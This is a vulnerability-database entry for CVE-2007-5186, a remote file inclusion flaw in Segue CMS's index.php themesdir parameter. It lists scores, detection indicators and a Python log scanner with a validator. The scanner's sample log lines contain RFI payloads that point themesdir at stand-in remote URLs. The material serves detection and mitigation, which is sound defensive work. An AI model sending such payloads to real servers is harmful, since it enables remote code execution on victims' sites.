CVE-2007-5186
published 2007-10-03


Priority: P347
Severity: medium (CVSS 2.0 base score 6.8)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: EXPLOIT
EPSS: 46.82% (98.7th percentile)
PHP remote file inclusion vulnerability in index.php in Segue CMS 1.8.4 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the themesdir parameter, a different vector than CVE-2006-5497. NOTE: this issue was disputed, but the dispute was retracted after additional analysis.

Affected

1 range

Vendor | Product | Version range | Fixed in
segue_cms | segue_cms | <= 1.8.4 | (none listed)

Detection & IOCs (extracted from sources)

url: index.php?themesdir=
path: index.php
  • Monitor HTTP requests to index.php whose 'themesdir' parameter carries a URL-like value (a scheme such as http:// or https://); this parameter is the remote file inclusion injection point in Segue CMS 1.8.4 and earlier.
  • This RFI vector is distinct from CVE-2006-5497, so detection rules must cover the themesdir parameter specifically rather than only the previously known Segue CMS RFI vectors.
  • The vulnerability is exploitable only when register_globals is disabled on the PHP server, so detection should not be limited to environments with register_globals enabled.
  • Because the Segue CMS 1.8.4 index.php RFI is exploitable specifically when register_globals is DISABLED, an atypical condition for RFI (register_globals being enabled is usually the risk factor), standard RFI mitigations that assume register_globals=on may not apply here.
  • This issue was initially disputed, but the dispute was retracted after additional analysis; treat it as a confirmed, valid vulnerability.
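The following is an added detection example, not code from cvebase or from the Segue CMS project. It applies the first bullet above to constructed Common Log Format access-log lines: it extracts the 'themesdir' parameter from requests to index.php, decodes one extra layer of percent-encoding, and flags any value that starts with a URL scheme. The sample log lines, IP addresses and the allow-list style validator at the end are constructed assumptions for illustration; the page does not document the format Segue CMS expects for themesdir.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Oct/2007:10:15:01 +0000] "GET /segue/index.php?themesdir=http://198.51.100.7/t HTTP/1.1" 200 512
203.0.113.9 - - [03/Oct/2007:10:15:04 +0000] "GET /segue/index.php?themesdir=themes/default HTTP/1.1" 200 8844
203.0.113.9 - - [03/Oct/2007:10:15:09 +0000] "GET /segue/index.php?themesdir=%68ttps%3a%2f%2fexample.org%2fx HTTP/1.1" 200 512
198.51.100.2 - - [03/Oct/2007:10:16:00 +0000] "GET /segue/index.php?action=view HTTP/1.1" 200 1200
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTOCOL", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Any scheme prefix (http:, https:, ftp:, php:, data:, ...) on a directory parameter
# means the value is a remote or wrapper include target rather than a local theme.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.IGNORECASE)

# Assumed mitigation rule: a theme selector should be a bare directory name, never a path or URL.
THEME_NAME_RE = re.compile(r'^[A-Za-z0-9_-]+$')


def themesdir_values(target):
    """Return decoded 'themesdir' values when the request targets index.php, else []."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if not (path.endswith('/index.php') or path == 'index.php'):
        return []
    # parse_qs already decodes once; decode a second time so a single extra
    # layer of percent-encoding on the scheme (e.g. %68ttp) is still caught.
    values = parse_qs(parts.query, keep_blank_values=True).get('themesdir', [])
    return [unquote(v) for v in values]


def is_rfi_attempt(value):
    """True when the themesdir value carries a URL scheme."""
    return bool(SCHEME_RE.match(value.strip()))


def scan_log(text):
    """Return (client_ip, timestamp, themesdir_value) for each URL-like themesdir request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF, or a malformed line; skip rather than crash the scan
        for value in themesdir_values(m.group('target')):
            if is_rfi_attempt(value):
                hits.append((m.group('ip'), m.group('ts'), value))
    return hits


def validate_themesdir(value):
    """Mitigation sketch (assumption, not Segue CMS code): accept only a bare
    theme directory name so that no URL, wrapper or path traversal reaches include()."""
    return value if THEME_NAME_RE.match(value) else None


if __name__ == '__main__':
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f'{ts} {ip} RFI attempt via themesdir={value!r}')
```

The validator at the end is the defender-side counterpart: rather than trying to enumerate bad schemes, a patched include path should accept only a known theme name and resolve it under a fixed local directory. Note that the detection is independent of the register_globals setting, as the third bullet above requires.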